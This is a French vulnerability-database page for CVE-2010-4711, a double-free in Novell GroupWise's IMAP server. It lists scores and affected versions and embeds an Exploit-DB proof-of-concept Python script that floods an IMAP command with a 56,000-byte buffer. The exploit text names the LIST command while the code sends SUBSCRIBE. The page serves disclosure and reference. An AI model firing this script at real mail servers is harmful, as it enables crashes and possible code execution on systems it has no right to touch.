CVE-2010-4711 : Détail

CVE-2010-4711

2.09%V3
Network
2011-01-31
19h00 +00:00
2024-09-17
04h28 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Double free vulnerability in the IMAP server component in GroupWise Internet Agent (GWIA) in Novell GroupWise before 8.02HP allows remote attackers to execute arbitrary code via a large parameter in a LIST command.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 15463

Date de publication : 2010-11-08 23h00 +00:00
Auteur : Francis Provencher
EDB Vérifié : Yes

##################################################################################### Application: {PRL} Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution Vulnerability Platforms: Linux Exploitation: Remote code execution CVE Number: Pending Novell TID: 7007151 ZeroDayInitiative: ZDI-10-242 Author: Francis Provencher (Protek Research Lab's) Blog: http://www.protekresearchlab.com/ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) The Code ##################################################################################### =============== 1) Introduction =============== Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell) ##################################################################################### ============================ 2) Report Timeline ============================ 2010-07-20 Vendor Contact by Tippingpoint 2010-11-08 Vendor release advisory ##################################################################################### ============================ 3) Technical details ============================ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability. The flaw exists within the IMAP server component which listens by default on TCP port 143. When handling an IMAP LIST command with a large parameter the process attempts to free the same memory twice. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the IMAP server. ##################################################################################### =========== 4) The Code =========== #!/usr/bin/python # # Francis Provencher # Protek Research Lab. # # import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = '\x41' * 56000 s.connect(('192.168.100.177',143)) s.recv(1024) s.send('A001 LOGIN test test \r\n') s.recv(1024) s.send('A001 SUBSCRIBE ' + buffer + '\r\n') s.recv(1024) s.close() ##################################################################################### (PRL-2010-07)

Products Mentioned

Configuraton 0

Novell>>Groupwise >> Version To (including) 8.0.2

Novell>>Groupwise >> Version 4.1

    Novell>>Groupwise >> Version 4.1a

      Novell>>Groupwise >> Version 5.0

        Novell>>Groupwise >> Version 5.1

          Novell>>Groupwise >> Version 5.2

          Novell>>Groupwise >> Version 5.5

          Novell>>Groupwise >> Version 5.5

            Novell>>Groupwise >> Version 5.57e

            Novell>>Groupwise >> Version 6.0

            Novell>>Groupwise >> Version 6.0

              Novell>>Groupwise >> Version 6.0

                Novell>>Groupwise >> Version 6.0.1

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5

                Novell>>Groupwise >> Version 6.5.2

                Novell>>Groupwise >> Version 6.5.3

                Novell>>Groupwise >> Version 6.5.4

                Novell>>Groupwise >> Version 6.5.6

                Novell>>Groupwise >> Version 6.5.7

                Novell>>Groupwise >> Version 7.0

                Novell>>Groupwise >> Version 7.0.1

                  Novell>>Groupwise >> Version 7.0.2

                    Novell>>Groupwise >> Version 7.0.3

                    Novell>>Groupwise >> Version 7.0.4

                    Novell>>Groupwise >> Version 8.0

                    Novell>>Groupwise >> Version 8.0.1

                      Références